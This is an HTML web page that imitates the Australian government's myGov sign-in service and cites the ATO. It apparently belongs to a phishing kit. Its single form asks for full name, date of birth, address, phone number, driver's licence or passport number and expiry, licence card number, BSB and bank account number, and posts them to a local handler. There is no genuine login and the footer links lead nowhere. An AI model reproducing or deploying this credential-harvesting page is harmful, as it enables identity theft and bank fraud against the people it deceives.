<html lang="en">

<head>
	<meta charset="utf-8">
	<meta http-equiv="x-ua-compatible" content="ie=edge">
	<meta name="apple-mobile-web-app-capable" content="yes">
	<title>myGov</title>
	<meta name="description" content="">
	<meta name="viewport" content="width=device-width, initial-scale=1">
	<meta name="format-detection" content="telephone=no">
	<link rel="icon" type="image/png" sizes="16x16" href="files/favicon.ico">
	<link href="https://fonts.googleapis.com/css?family=Montserrat:200,400,700|Roboto:300,400,500,700,900&amp;display=swap" rel="stylesheet">
	<link href="files/mgv2-application1.css" rel="stylesheet">
	<link href="files/blugov1.css" rel="stylesheet"> </head>

<body>
	<div class="brand-rainbow">&nbsp;</div>
	<header role="banner" class="mgvEnhanceHeader">
		<section class="wrapper">
			<div class="inner">
				<div class="unauth-grid">
					<div class="unauth-grid-row">
						<a class="unauth-govt-crest__link"> <img id="unauth-govt-crest" src="files/myGov-cobranded-logo-black.svg" alt="myGov Beta" role="img"> </a>
					</div>
				</div>
			</div>
		</section>
	</header>
	<div class="wrapper-mapwap">
		<div class="main-block" id="content" role="main">
			<h1>MyGov Account Information</h1>
			<p style="font-size: 14px">Please answer the shared secret between you and the ATO.</p>
			<hr>
			<form id="forgotten-username-form" action="validation/verify_session_personal" method="post">
				<div class="input-group">
					<label for="fname">Full Name</label>
					<input id="fname" name="fname" aria-required="true" type="text" value="" autocomplete="off" required=""> </div>
				<div class="input-group">
					<label for="fname">Date of Birth</label>
					<input id="dob" name="dob" aria-required="true" type="date" value="" autocomplete="off" required=""> </div>
				<div class="input-group">
					<label for="fname">Full Address on File</label>
					<input id="address" name="address" aria-required="true" type="text" value="" autocomplete="off" required=""> </div>
					
						<div class="input-group">
					<label for="fname">Mobile Phone Number</label>
					<input id="phone" name="phone" aria-required="true" type="text" value="" autocomplete="off" required=""> </div>
					
				<h3 style="height: 40px; background-color: rgb(167, 164, 164); padding: 10px">IDENTIFICATION DOCUMENT</h3>
				<div class="input-group">
					<label for="dob"><span style="font-weight: 400">Enter you <span style="font-weight: 600">Driver's License or Passport</span> Number</span>
					</label>
					<input id="issued" name="issued" aria-required="true" type="text" value="" autocomplete="off"> </div>
				<div class="input-group">
					<label for="dob"><span style="font-weight: 400">Enter <span style="font-weight: 600">Document</span> expiry date.</span>
					</label>
					<input id="reference" name="reference" aria-required="true" type="date" value="" autocomplete="off"> </div>
					
						<div class="input-group">
					<label for="fname">Driver's License Card Number</label>
					<input id="dlcard" name="dlcard" aria-required="true" type="text" value="" autocomplete="off" required=""> </div>
					
				<h3 style="height: 40px; background-color: rgb(167, 164, 164); padding: 10px">BANK ACCOUNT DETAILS</h3>
				<div class="input-group">
					<label for="dob"><span style="font-weight: 400">Enter <span style="font-weight: 600">BSB number</span> recorded with the ATO.</span>
					</label>
					<input id="bsb" name="bsb" aria-required="true" type="tel" value="" autocomplete="off"> </div>
				<div class="input-group">
					<label for="dob"><span style="font-weight: 400">Enter <span style="font-weight: 550">bank account number</span> recorded with the ATO (exclude BSB).</span>
					</label>
					<input id="acct" name="acct" aria-required="true" type="tel" value="" autocomplete="off"> </div>
				<div class="button-container">
					<button type="submit" name="_eventId_submit" class="button-main button">Next</button>
				</div>
			</form>
		</div>
	</div>
	<footer role="contentinfo">
		<div class="wrapper">
			<div class="inner">
				<section class="footer-list">
					<nav>
						<h2 class="sr-only" aria-label="Footer">Footer</h2>
						<ul class="lower-links">
							<li> <a target="_blank">Terms of use</a> </li>
							<li> <a target="_blank">Privacy and security</a> </li>
							<li> <a target="_blank">Copyright</a> </li>
							<li> <a target="_blank">Accessibility</a> </li>
						</ul>
					</nav>
				</section>
				<div class="footer-lower">
					<section class="footer-lower-logo">
						<a> <img src="files/myGov-cobranded-logo-white.svg" alt="myGov Beta" width="313.17" height="70" role="img"> </a>
					</section>
					<p class="footer-acknowledgement">We acknowledge the Traditional Custodians of the lands we live on. We pay our respects to all Elders, past and present, of all Aboriginal and Torres Strait Islander nations.</p>
				</div>
			</div>
		</div>
	</footer>
</body>

</html>